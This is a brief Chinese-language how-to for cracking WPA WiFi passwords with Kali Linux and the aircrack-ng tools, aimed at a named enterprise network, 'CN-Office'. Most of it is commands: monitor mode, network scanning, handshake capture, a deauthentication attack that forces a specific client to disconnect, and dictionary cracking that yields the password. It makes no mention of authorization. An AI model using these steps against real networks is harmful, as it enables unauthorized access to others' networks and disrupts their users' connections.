★ Kali Linux 破解Wifi密码

★ 常见无线加密模式分别有：WPS、WEP、WPA，尽管WPA加密方式不太容易被破解，但如果有一个很好的密码字典，还是可以破解出来的。

准备：

1、Kali Linux系统。

2、无线网卡（需支持监听模式）。

3、密码字典（重要）。

思路：设置网卡为监听模式---寻找要破解的WIFI设备MAC地址---抓取握手数据包---破译Wifi密码包

1、查看本机无线网卡（本机wlan1为支持监听的无线网卡）， root@kali:~# airmon-ng

2、启动网卡为监听模式。root@kali:~# airmon-ng start wlan1

3、查看附近Wifi情况和选择要破解的Wifi。root@kali:~# airodump-ng wlan1mon

4、按上图搜索出的Wifi中，我们现在CN-Office作为要破解的目标，因为这是企业Wifi，采用多AP模式，信号越强，就会排序在最前面。我们的目标CN-Office（DC:99:14:7D:AB:00）

5、选择 CN-Office（DC:99:14:7D:AB:00）进行抓取握手包。root@kali:~# airodump-ng -c 1 -w office --bssid DC:99:14:7D:AB:00 wlan1mon

说明：-c：指定选择的频道，-w：指定一个文件名，用于保存捕获的数据，--bssid：指定攻击的BSSID。

上图为 DC:99:14:7D:AB:00 所链接的设备，STATION为对应的MAC地址。

6、查看所有抓取的数据包

如果不能抓取到握手包，可以尝试使用命令攻击AP，使其AP和客户端重新握手，从而抓取握手包。

攻击命令：root@kali:~# aireplay-ng -0 5 -a DC:99:14:7D:AB:00 -c B0:EB:57:EA:94:72 wlan1mon

-0 5：表示使用Deauth攻击模式，后面的5为攻击次数。

-a：指定AP的MAC地址。

-c ：指定客户端的MAC地址。

7、破解抓取的数据包。office-01.cap

root@kali:~# aircrack-ng -w /passwd/common.txt office-01.cap

说明：-w：密码字典保存路径。office-01.cap 为抓取的握手包，里面包含有Wifi链接密码。

上图中的 KEY FOUND 就是破译结果，而12345678则为Wifi密码。